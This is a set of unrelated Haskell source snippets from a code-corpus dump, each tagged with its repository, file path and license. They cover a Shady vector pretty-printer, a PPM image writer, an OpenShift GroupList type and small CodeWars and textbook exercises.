-- Pretty-printing here instead of Vec, so we can use VectorT. Numeric
-- instances here because Show is here.
instance (IsNat n, IsScalar a, Pretty a) => Pretty (Vec n a) where
pretty v | n == 1 = pretty (head as)
| otherwise = pretty (vectorT :: VectorT n a) <> tupled (map pretty as)
where as = toList v
n = length as
-- instance (IsNat n, IsScalar a, Show a) => Show (Vec n a) where
-- show v | n == 1 = show (head as)
-- | otherwise = show (vectorT :: VectorT n a)
-- ++ "(" ++ intercalate "," (map show as) ++ ")"
-- where as = toList v
-- n = length as
-- 2011-10-26: I removed the Show instance above in favor of a new
-- Haskell-eval'able Show instance in TypeUnary.Vec. To do: check whether
-- this change broke Shady's code generation. Maybe not, if the code
-- generation uses Pretty instead of Show.
instance (IsNat n, IsScalar a, Pretty a) => PrettyPrec (Vec n a)
instance (IsNat n, IsScalar a, PrettyPrec a) => HasExpr (Vec n a)
-- -- Generate bogus Enum instance, needed by 'Integral'
-- #define INSTANCE_Enum
-- #define CONSTRAINTS IsNat n, IsScalar applicative_arg,
-- #define APPLICATIVE (Vec n)
-- #include "ApplicativeNumeric-inc.hs"
instance (IsNat n, IsScalar a, FMod a) => FMod (Vec n a) where
fmod = liftA2 fmod
| sseefried/shady-gen | src/Shady/Language/Type.hs | agpl-3.0 | 12,068 | 0 | 12 | 2,642 | 3,238 | 1,752 | 1,486 | 187 | 3 |
module Print2 where
main :: IO ()
main = do
putStrLn "Count to four for me:"
putStr "one, two"
putStr ", three and"
putStrLn " four!"
| thewoolleyman/haskellbook | 03/03/chad/print2.hs | unlicense | 143 | 0 | 7 | 35 | 43 | 19 | 24 | 7 | 1 |
{- Image.hs
- Write an image to PPM (Portable Pixmap) format.
- http://en.wikipedia.org/wiki/Portable_pixmap
-
- Timothy A. Chagnon
- CS 636 - Spring 2009
-}
module Image where
import Color
-- Convert a pixel to PPM P3 format
p3color :: Color -> String
p3color (r, g, b) = unwords [show r, show g, show b]
-- Write pixels to PPM file
writePPM :: String -> Int -> Int -> [Color] -> IO ()
writePPM file width height pixels = do
let magic = "P3"
let params = unwords [show x | x <- [width, height, 255]]
let p3pixels = map p3color pixels
let outData = unlines ([magic, params] ++ p3pixels)
writeFile file outData
return ()
| tchagnon/cs636-raytracer | a1/Image.hs | apache-2.0 | 654 | 0 | 14 | 149 | 199 | 102 | 97 | 12 | 1 |
module CodeWars.MoleculeToAtoms where
import Debug.Trace
import System.Random
import Control.Monad.State.Lazy
debug = flip trace
parseMolecule :: String -> Either String [(String,Int)]
parseMolecule formula = Left "Not a valid molecule"
parseM :: String -> String -> Either String [(String,Int)]
parseM = undefined
-- randomSt :: (Random a, RandomGen g) => State g a
| lihlcnkr/codejam | backup/src/CodeWars/MoleculeToAtoms.hs | apache-2.0 | 375 | 0 | 9 | 59 | 98 | 56 | 42 | 9 | 1 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE TypeOperators #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
module Openshift.V1.GroupList where
import GHC.Generics
import Data.Text
import Openshift.Unversioned.ListMeta
import Openshift.V1.Group
import qualified Data.Aeson
-- |
data GroupList = GroupList
{ kind :: Maybe Text -- ^ Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds
, apiVersion :: Maybe Text -- ^ APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources
, metadata :: Maybe ListMeta -- ^
, items :: [Group] -- ^ list of groups
} deriving (Show, Eq, Generic)
instance Data.Aeson.FromJSON GroupList
instance Data.Aeson.ToJSON GroupList
| minhdoboi/deprecated-openshift-haskell-api | openshift/lib/Openshift/V1/GroupList.hs | apache-2.0 | 1,162 | 0 | 9 | 172 | 125 | 77 | 48 | 19 | 0 |
-- http://www.codewars.com/kata/53934feec44762736c00044b
module NumberToString where
a = show 123 | Bodigrim/katas | src/haskell/8-Number-toString.hs | bsd-2-clause | 98 | 0 | 5 | 9 | 13 | 8 | 5 | 2 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.